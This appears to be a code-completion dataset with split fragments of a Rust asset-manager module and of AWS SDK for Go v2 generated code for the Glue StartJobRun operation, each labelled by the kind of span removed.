/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
}
| {
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} | conditional_block |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> |
}
| {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
} | identifier_body |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func | (region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| newServiceMetadataMiddleware_opStartJobRun | identifier_name |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
